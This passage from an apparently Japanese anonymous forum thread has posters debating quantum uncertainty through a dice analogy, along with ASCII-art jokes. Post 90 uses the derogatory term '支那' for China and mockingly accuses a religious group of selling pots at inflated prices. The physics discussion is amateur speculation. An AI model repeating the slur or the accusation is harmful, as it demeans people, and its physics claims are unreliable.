90 : 人i ノ:;;,ヒ=-;、 (~´;;;;;;;゛'‐;;;) ,i`(;;;゛'―---‐'ヾ ヽ;;';ー--―-、'';;;;;゛) /::: s yohane \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ. / \::.| ト‐=‐ァ' |.:./ ウエッヘヘヘッ スエ教では支那の土産壺を輸入して150万円で売っておるよ♪ . \ `二´ '/ ,r――--、,,_ノ r、 三 η L___,,..-―‐-、 ( 〃ヽヽ //ヾヽ ) ヽ `ヽ、 ⊂ニmy godニ⊃ ,r'' / ヽ } ` ー-ヾヽ// ヽヽ〃ー‐''7 / ヽ .{ ι' 三 ヽ) {. /
91 : どうして量子の不確定性が単なる観測問題だって言えるの?
92 : さてグルジェフでも読んでみるかな でもやっぱいいや、一ヶ月間プールに通う
93 : まず、「目を隠したさいころ」を作るわけです。 このさいころが着底状態になると一対の上面と背面の目が決まるわけです。 この二つの目は一つのさいころの面体を原因として決まった一対の目であって さいころ則によって(誰でも知ってる)「相互に関係する偏面状態」にあるわけです。 しかしその偏面がどちらの状態であるかは、「隠した目を剥がすまでわからない」。 隠した目を剥がす前の偏面状態について「確率的な分布」しか存在しない。 ところがこのさいころを振って上面の隠れた目の状態を観測すると、 その背面の隠れた目の状態はそれとの相関により決まってしまうはずである。 それなら各面の偏面状態は確率的なんじゃなくて本当は決まってるじゃねーか! しかしそんな単純にはいかない。 (いや単純である) 以下省略 こう想定できる 「隠した二つの上面と背面の目は同時にさいころに実在(内在?)している。」 同時の何が「同じ」なんだ? さいころが無面体なら検証可能どころか、それを理解可能とする条件なんてねーだろ? という反論にはこのように応えます。 「それは円球なのである」 また稚戯ってしまったか・・
94 : おーい抄録ー 怒っていいぞ〜 俺は書き逃げするからな〜w イケメンのスモ氏がクリスマスに2ちゃんやってるわけねーだろ オレは断じてスモ氏じゃない ここ1週間くらい名無しで楽しんでるとかそんなことはない 知弁スレを建てたとかそんな馬鹿なことはしない チラ裏で使おうとかそんな不遜な考えなはずないだろ 機械氏てめえ前スレのレスに応えるために出て来いとか言わないよ絶対 まったくもう年末だぜ
95 : 確率という概念は非常にくさい
96 : >>93 サイコロの状態というものが嘗ての“じいさん”の言うような完全自発的な確率創造神であるなら そのアナロジーはほぼ正しいかもしれない。 しかしサイコロの状態は確率以外の外部観測状態によって“ほぼ”100%規定可能なのである。 「目隠ししたサイコロなら、その目隠しを取れ。そこに因果を見よ。それがヒトの知恵だ。」 しかし量子力学が唱える世界は 「ミクロの目隠しは、ヒトのいかなる努力によっても取り去ることができない」ではなく 「ミクロの目隠しなどもとから無く、剥きだしの幽霊(確率)がそこにいる」 と言う方が比喩としては適当。 サイコロのアナロジーは通じない。 それをアスペが実証したのである。 確率が先か因果律が先か。 私は確率原理主義を目指す。 しかしそれはスモ氏の求める「美」からは遠いのだろう。 超因果的な「同時」こそ真の同時なのである。 ・・結局ポエムになるな・・・w
97 : もうザんのったろりんじゃよ!
98 : / ̄ ̄ ̄ ̄ \ | (゚) (。) | | (゚) (。) | | (゚) (。) | |┌ ⊂⊃ ┐| | \___/ | 果たしてそうかな? \ \|/ / / \ | | | |
99 : 幽霊(確率)は人が見るもの 自然の性質じゃない だからといって自然は決定してるのだ、 と考えてしまこともまた誤ってる それを円球という喩えで示唆したつもり 観測とは、規定とはどういうことか? 私はそこから解決を導くことを目指す 寝てもうた
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